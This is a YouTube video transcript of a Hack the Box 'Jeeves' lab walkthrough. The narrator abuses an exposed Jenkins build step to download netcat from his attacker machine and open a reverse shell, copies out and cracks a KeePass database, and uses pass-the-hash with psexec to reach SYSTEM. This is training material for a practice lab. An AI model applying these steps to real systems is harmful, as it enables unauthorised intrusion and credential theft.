What's up YouTube, Cole Mahoney here, aspiring IT and cybersecurity professional, and today we are going through the Jeeves box. This is a medium difficulty Windows box from Hack the Box. Alright, let's go ahead. We have our Rust scan all done. So we got port 80 open, port 135, 445, and port 50,000. So we can go ahead and check out port 80, but there is really nothing on here. It's just an Ask Jeeves website, which was a website in the early internet, I think. And we are frozen a little bit. Let's go ahead and exit out of that. But what we're really interested in is this right here, on port 50,000. So let's go ahead and copy that. We have an HTTP error. Go powered by Jetty. If we click on that, it's just gonna kind of bring us to an about page, project page. And at this point in the box, I wanted to dig a little bit deeper, so I did some directory busting. And I found a subdirectory called Ask Jeeves on this port right here. Let's go ahead and let that load up. And there we go. We are in Jenkins right now. And we can log in. But we're going to go ahead and go to Manage. We can do New Item. Let's go ahead and create a new project. Call it new, we'll just call it new. So freestyle project, this is a central feature of Jenkins. Jenkins will build your project, combining any SCM with any build system, and this can even be used for something other than a software build. This is kind of like the whole point of Jenkins as well. It's pushing projects and of such. Let's go ahead over here, and if we come all the way down here to build, we can add a build step. And if we want to execute something like a Windows bash command, let's go ahead and run who am I, and I want to build it right now. Let's go ahead and build it. Click on that, console output. We have success, and we are, I can't say that, but this is going to be our user right here. It's just our proof of concept. Let's go ahead and delete that build. Delete the project. Let's go ahead and create a brand new one. Now, how can we use this to get something like a reverse shell? So let's go ahead and type new again. Freestyle project, okay. And it seems to be running command prompt, but you can run PowerShell. Let's see here, wget http. Let's go ahead and grab a file from our Kali machine, c.exe. It's out file. In c.exe, and then let's go ahead and run it in c.exe, cmd.exe 10.10.15.86. See if we can run this on port 444. So for this we'll need to let's go ahead and make our directory. Let's go ahead and RL. Actually, this will, yeah, do it like this. Actually, we need to go CD desktop, tools, Python 3. Run that. RL wrap and C. And let's go ahead and save. And see if this can actually build. So it grabbed our file. And we now have a reverse shell. We can type, who am I? We are Jeeves, whichever that user's name is. Let's go to CD. Let's CD back a couple. CD back to users. Get out of the administrator. AOH, SUKE. CD desktop, dir, type out our user flag right there. And just from kind of looking around, so I went into CD documents. We have a ch.kdbx file. So let's go ahead and look that up. BX file. So this file is an encrypted password database used primarily by KeePass Password Safe. And so it's going to need a password, but we can open it. And there is KeePass XC on Linux as well. So let's go ahead and get this file moved over. CD into Jeeves. Do mpacket, SMB server, share, SMB2 support. Yeah, that's right. PowerShell. Let's do copy. Doing this right. Let's see here. No, not that. There we go. KDBX. We'll do our IP. 6. Share. I think that's all we need. It should copy itself over. Exit out of that. Okay, everything copied over. And so let's say KDBX file crack using John. This is what I used before. We can do KeePass to John, take our ch.kdbx file and move that over to, we'll do key.txt. Now have that, so we can do John, key.txt. I believe you can format KeePass. I already cracked this, but we can do, let's do like this. There we go. And our password is going to be moonshine1. So we can do KeePass XC ch.kdbx. This is going to open this up right here. And we can do our password, moonshine1. We have a couple interesting things. But if we're looking around, we have backup, we have DC recovery using an administrator. And now this is not the password. Got a little stuck here earlier, but it's actually going to be in backup. and we're actually going to be supplied with a hash. And this is going to be the administrator's password. So let's go ahead and exit out of that. We can do in packet ps exec administrator at 10.129.228.112 hash. What are we missing here? PS exec syntax. With hash. Hashes. Okay, there we go. And let's see if we can log in as admin. Alright, sweet. Who am I? We are NT Authority System. We'll go cd user. Cd users. Okay, we are in. And let's go to desktop that's where the flag usually is. And there we have hm.txt. So let's go ahead and type that out. hm.txt. It says the flag is elsewhere. Look deeper. And so we can do this by running dir. It's that r. And we have hm.txt semicolon root.txt. There's a certain way to do this. I do not remember syntax. It is PowerShell. Get content. Path. hm.txt. Stream. Root.txt. That was like the roughest part to figure out. There's our root flag right there. Alright guys, this box was it was definitely difficult for me. And it made me definitely use some hints, look at the walkthrough a few times. But this is stuff that I'll never forget, and it is really okay to look at hints when you're going through a box. Some people say it's bad, or like, oh, if you can't do this, you're not going to pass this certification or that certification. Like, as long as you're learning, that's really what all that matters. Alright guys, I hope you guys are doing great in your cybersecurity journeys, and I'm going to see you all next time.